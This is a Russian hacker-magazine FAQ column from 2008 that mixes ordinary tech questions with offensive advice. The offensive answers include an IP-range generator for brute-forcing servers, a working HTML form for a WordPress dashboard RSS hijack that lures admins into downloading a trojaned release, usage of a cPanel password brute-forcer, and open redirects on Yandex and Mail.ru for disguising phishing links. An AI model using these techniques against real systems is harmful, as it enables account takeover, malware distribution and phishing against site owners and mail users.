Издательский дом ООО "Гейм Лэнд"ЖУРНАЛ ХАКЕР 120, ДЕКАБРЬ 2008 г.

FAQ

Маг (icq 884888, http://wap-chat.ru)


Q: Занимаюсь брутом дедиков. Нужно сгенерировать список IP-адресов для брута по определенному диапазону. Как это сделать?

A: С поставленной тобой задачей легко справятся следующие несколько строк php-кода:

<?php
$ip_start='127.0.0.1'; //начальный ip диапазона
$ip_end='127.0.1.3'; //конечный ip диапазона
$ip_start = ip2long($ip_start);
$ip_end = ip2long($ip_end);
for($i=$ip_start;$i<($ip_end+1);$i++)
{
print long2ip($i)."\n";
}
?>

После запуска скрипт выведет в окно браузера все IP из заданного диапазона.

Q: Есть ли реальный способ взломать последние версии WordPress?

A: С чуть ли не еженедельным выходом новых версий вышеназванного движка многие не верят в возможность его взлома. Но недавно я нашел в WordPress очень серьезный баг, позволяющий изменять RSS-ленты главной страницы админки блога на свои.

Итак, в Dashboard содержатся следующие ленты новостей: новости плагинов, incoming links, новости devblog c wordpress.org. Теперь смотри: скопируй ленту новостей с девблога официального сайта вордпресса, затем вставь в нее в качестве первого поста объявление о security-патче (или просто новой версии) блога. В посте (естественно, в ссылке на скачку) укажи свой протрояненный дистрибутив вордпресса. Вот html-код для подмены рсс-ленты девблога на свою:

<form action="/wp263/wp-admin/" method="post">
<input name="widget-rss[1][url]" type="text" value="http://ссылка_на_наш_evilrss.com" />
<input name="widget-rss[1][title]" type="text" value="Заголовок рсс" />
<input name="widget-rss[1][items]" value="сколько показывать постов в рсс" />
<input name="widget-rss[1][show_summary]" type="checkbox" value="1" checked="checked"/>
<input name="widget-rss[1][show_author]" type="checkbox" value="1" />
<input name="widget-rss[1][show_date]" type="checkbox" value="1" checked="checked"/>
<input type="hidden" name="widget-rss[1][submit]" value="1" />
<input type='hidden' name='sidebar' value='wp_dashboard' />
<input type='hidden' name='widget_id' value='dashboard_primary' />
<input type='submit' value='Save' />
</form>

P.S. Уязвимость затрагивает все последние версии WordPress (на момент написания фака: 2.5-2.6.3). Для ее использования нужно зарегистрироваться на блоге жертвы.

Q: Как домайнеры находят и регистрируют проэкспайренные домены?

A: Сервисов, предоставляющих подобную информацию, существует великое множество. Один из них – http://www.vztools.com.Зайдя на сайт, ты увидишь слева в колонке списки дат, когда проэкспайрились домены. Нажав на выбранную дату, ты получишь отсортированный по длине список доменов, дата регистрации которых истекла. К примеру, вот часть четырехбуквенников, за которые забыли проплатить до 2 мая 2008 года:

clsq.com
cqlo.com
cwgy.com
czfi.com
dllw.com
dmqa.com
dxtw.com
erjs.com
esxa.com
fyal.com
gxet.com
gxrf.com
hjzy.com

В списках могут попадаться довольно-таки неплохие домены, так что не зевай!

Q: Есть ли асечный клиент под КПК, с которым можно работать без стилуса?

A: Такой клиент действительно есть. Это известный и при этом бесплатный PIGEON. Из описания программы:«PIGEON! - ICQ клиент, это удобная и красивая программа, разработанная для комфортного общения во время работы с КПК. Отличительной особенностью является современный интерфейс, ориентированный на работу без стилуса, только нажатием пальцами. Работает без установки на всех PocketPC-устройствах под ОС WM2003, WM5, WM6, WM6.1, Smartphones».

Особенности:

  • Управление пальцами, без стилуса;
  • Поддержка qQVGA, VGA, QVGA, WVGA экранов;
  • Поддержка PROXY SOCKS 4/5, HTTP;
  • Поддержка анимированных смайл-паков Miranda & QIP;
  • Поддержка нестандартных паролей в HEX-виде. В пароле писать hex: и 16-тиричные символы без пробелов;
  • Поддержка хардварной клавиатуры;
  • Возможность писать с нескольких номеров ICQ.

Скачать клиент можно на официальном сайте - http://pigeon.vpro.ru.

Q: Как брутить пароли к CPanel на хостинге?

A: В этом тебе поможет Cpanel Password Brute Forcer, написанный на Perl неким Hessam-x. Скрипт основан на баге, обнаруженном Hossein Asgar (Simorgh-ev.com): «In cpanel Check Passwords with Headers and attackers can Brute Force with base54 authentication». Сам скрипт можно скачать на официальном блоге Hessam-x (также доступен и php-исходник) – http://hessamx.wordpress.com/2007/03/21/cpanel-bruteforce-problems.

Использование брутера весьма простое. Из командной строки запускай скрипт следующим образом: cpanel.pl [HOST] [User] [PORT][list]. Тут [HOST] - домен, где расположена CPanel, [User] - юзер для брута, [PORT] - порт CPanel (по дефолту 2082), [list] - список паролей.

Q: Какие вообще существуют ядерные сплойты под Linux? Где их скачать?

A: Вот практически полный список ядерных сплойтов для веток 2.2, 2.4 и 2.6:

Также хочу посоветовать тебе список эксплойтов под конкретные оси и сервисы на них -http://indounderground.wordpress.com/2008/06/14/a-nice-list-of-root-exploits-and-working-links.

Q: Как можно зашифровать фейковую ссылку, например, в мыле?

A: Большинство спамеров и хеккеров шифруют свои ссылки с помощью редиректов, расположенных на трастовых сайтах. Сейчас в паблике известны следующие редиректы:

http://yandex.ru/redir?dtype=market&uid=854942812168473879&
categid=628&price=7247&ext=&hyper_id=&hyper_cat_id=90711&
pp=7&cp=10&cb=10&cp_ab=0&ae=1&shop_id=6434&pof=&url=http://твой_evil.сайт;

http://go.mail.ru/click?url=http://твой_evil.сайт;

http://r.mail.ru/clb1234/r.mail.ru/clb1234/r.mail.ru/clb1234/r.mail.ru/clb1234/http://твой_evil.сайт;

Также посоветовал бы кодировать твою ссылку в urlencode с помощью сервиса http://hack-shop.org.ru/tools-code-encode.

P.S. А чтобы у юзера не появлялись сообщения о переходе на другой сайт (если в его мылбоксе включен html, конечно), можно дописать в теге ссылки параметр target=_self или target=_blank.

Q: Бручу аськи. Как узнать, насколько эксклюзивны пароли в моих пасс-листах?

A: Недавно на асечке (http://forum.asechka.ru/showthread.php?t=107702) появилась программа ExclusivePass за авторством NemeZz, с помощью которой ты сможешь проверить на уникальность свои пароли. Вот что сам автор программы пишет о ней:

Мной была написана данная программа для ускорения поиска вашего пароля в имеющихся базах Асечки и Грабберз. Все они собраны вместе в удобной форме. А это - порядка 2500 постов.

Использование - должно быть интуитивно понятно. Вводим пароль - получаем все посты, в которых он содержится. Отображается дата поста, полный линк на оригинал (кликабельный) + собственно сообщение, в котором жирным красным шрифтом выделяется искомый текст.

Внимание: поиск чувствителен к регистру, но это логично, так как пароль и ПаРоЛь - это разные пароли).

Q: Хочу установить Skype на свой мобильный телефон! Это реально?

А: Вполне, только не рассчитывай на то, что удастся осуществлять звонки по GPRS. Скорее всего, ничего хорошего не выйдет и в случае использовании отечественного EDGE, который, хотя и может похвастаться чуть большей полосой пропускания, но также отличается высокими задержками. Впрочем, расстраиваться из-за этого не стоит: тарифы с безлимитным трафиком (а иначе смысл звонить через IP?) по-прежнему практически не распространены. Совсем другое дело, если твой телефон поддерживает WI-Fi, а рядом есть точка доступа. Звони, сколько влезет. Для Windows Mobile есть специально подготовленная версия от самих разработчиков Skype, а для обычных телефонов с Java и смартфонов на базе Symbian легко инсталлится прога fring (www.fring.com). В случае поездок за границу, где Wi-Fi повсюду, подобными приблудами можно сэкономить не одну сотню долларов на счету.

Q: Есть ли возможность перенаправить пользователя с моей LJ-страницы на другой сайт?

А: Для бесплатного аккаунта это невозможно, а вот пользователи с платными учетными записями могут добавить теги редиректа, воспользовавшись редактором HTML-шаблонов.

Q: По долгу службы я обслуживаю большой и самый разнообразный парк машин. К сожалению, не имею возможность везде установить одну и ту же программу для удаленного управления, поэтому приходится использовать клиент и для RPD, и для VNC, и тот же PuTTY для SSH-сессий. Возможно, есть более универсальное решение, позволяющее коннектиться к самым разным системам?

A: На одном из наших недавних дисков мелькал инструмент, точь-в-точь подходящий по требованиям. До сих пор являясь бесплатной mRemote (www.mremote.org/wiki), он позволяет обращаться к удаленным системам по самым разным протоколам RDP (Remote Desktop), VNC (Virtual Network Computing), ICA (Independent Computing Architecture), SSH (Secure Shell), Telnet (TELecommunication NETwork), HTTP/S (Hypertext Transfer Protocol), Rlogin (Rlogin), RAW. Каждое соединение - в отдельной вкладке, что вдвойне удобно!

Q: Я создал в Ubuntu нового пользователя, но тот не может пользоваться командой sudo. Почему? Как исправить?

A: Чтобы оградить пользователей от частой ошибки, когда работа с самого начала и постоянно ведется под аккаунтом администратора (что, естественно, очень плохо), разработчики дистрибутива намеренно отключили root аккаунт. Все административные задачи выполняются через команду sudo. Напомню, что команда sudo предоставляет возможность выполнять команды либо от имени root, либо других пользователей. В Ubuntu по умолчанию использование sudo разрешено только первому пользователю, однако это легко можно исправить. Правила, используемые sudo для принятия решения о предоставлении доступа, находятся в файле /etc/sudoers. Простейшая конфигурация выглядит так:

Defaults env_reset
root ALL=(ALL) ALL
user ALL=(ALL) ALL

Такая конфигурация дает пользователю user все права пользователя root при выполнении команды sudo. Обрати внимание на директиву Defaults env_reset: она полностью запрещает все пользовательские переменные при исполнении команд от имени root. Повышая уровень безопасности, это одновременно может привести к некоторым проблемам и несовместимостям. Поэтому использование личных переменных можно разрешить, например, какой-то конкретной группе или отдельному пользователю, добавив следующую строку в конфиг: "Defaults:%admin !env_reset". В этом случае для пользователей группы admin переменные окружения будут разрешены.

Q: Как проще всего звонить в Москву и Питер бесплатно?

A: К сожалению, мировые гиганты VoIP не спешат предоставлять безлимитные планы и бесплатные звонки по России. Однако у местных операторов такая возможность есть. Я говорю о sipnet.ru, а также некоторых известных интернет-провайдерах, которые помимо всего прочего предоставляют услуги IP-телефонии на основе технологии SIP. Для использования придется установить специальную программу или же приобрести SIP-роутер. В качестве программного средства могу порекомендовать утилиту X-Lite. При минимуме настроек, которые в большинстве случаев сводятся к простому вводу логина и пароля, она позволяет уже через несколько минутпосле установки осуществлять звонки на городские телефоны Москвы и Питера абсолютно бесплатно.

Содержание
загрузка...
Журнал Хакер #151Журнал Хакер #150Журнал Хакер #149Журнал Хакер #148Журнал Хакер #147Журнал Хакер #146Журнал Хакер #145Журнал Хакер #144Журнал Хакер #143Журнал Хакер #142Журнал Хакер #141Журнал Хакер #140Журнал Хакер #139Журнал Хакер #138Журнал Хакер #137Журнал Хакер #136Журнал Хакер #135Журнал Хакер #134Журнал Хакер #133Журнал Хакер #132Журнал Хакер #131Журнал Хакер #130Журнал Хакер #129Журнал Хакер #128Журнал Хакер #127Журнал Хакер #126Журнал Хакер #125Журнал Хакер #124Журнал Хакер #123Журнал Хакер #122Журнал Хакер #121Журнал Хакер #120Журнал Хакер #119Журнал Хакер #118Журнал Хакер #117Журнал Хакер #116Журнал Хакер #115Журнал Хакер #114Журнал Хакер #113Журнал Хакер #112Журнал Хакер #111Журнал Хакер #110Журнал Хакер #109Журнал Хакер #108Журнал Хакер #107Журнал Хакер #106Журнал Хакер #105Журнал Хакер #104Журнал Хакер #103Журнал Хакер #102Журнал Хакер #101Журнал Хакер #100Журнал Хакер #099Журнал Хакер #098Журнал Хакер #097Журнал Хакер #096Журнал Хакер #095Журнал Хакер #094Журнал Хакер #093Журнал Хакер #092Журнал Хакер #091Журнал Хакер #090Журнал Хакер #089Журнал Хакер #088Журнал Хакер #087Журнал Хакер #086Журнал Хакер #085Журнал Хакер #084Журнал Хакер #083Журнал Хакер #082Журнал Хакер #081Журнал Хакер #080Журнал Хакер #079Журнал Хакер #078Журнал Хакер #077Журнал Хакер #076Журнал Хакер #075Журнал Хакер #074Журнал Хакер #073Журнал Хакер #072Журнал Хакер #071Журнал Хакер #070Журнал Хакер #069Журнал Хакер #068Журнал Хакер #067Журнал Хакер #066Журнал Хакер #065Журнал Хакер #064Журнал Хакер #063Журнал Хакер #062Журнал Хакер #061Журнал Хакер #060Журнал Хакер #059Журнал Хакер #058Журнал Хакер #057Журнал Хакер #056Журнал Хакер #055Журнал Хакер #054Журнал Хакер #053Журнал Хакер #052Журнал Хакер #051Журнал Хакер #050Журнал Хакер #049Журнал Хакер #048Журнал Хакер #047Журнал Хакер #046Журнал Хакер #045Журнал Хакер #044Журнал Хакер #043Журнал Хакер #042Журнал Хакер #041Журнал Хакер #040Журнал Хакер #039Журнал Хакер #038Журнал Хакер #037Журнал Хакер #036Журнал Хакер #035Журнал Хакер #034Журнал Хакер #033Журнал Хакер #032Журнал Хакер #031Журнал Хакер #030Журнал Хакер #029Журнал Хакер #028Журнал Хакер #027Журнал Хакер #026Журнал Хакер #025Журнал Хакер #024Журнал Хакер #023Журнал Хакер #022Журнал Хакер #021Журнал Хакер #020Журнал Хакер #019Журнал Хакер #018Журнал Хакер #017Журнал Хакер #016Журнал Хакер #015Журнал Хакер #014Журнал Хакер #013Журнал Хакер #012Журнал Хакер #011Журнал Хакер #010Журнал Хакер #009Журнал Хакер #008Журнал Хакер #007Журнал Хакер #006Журнал Хакер #005Журнал Хакер #004Журнал Хакер #003Журнал Хакер #002Журнал Хакер #001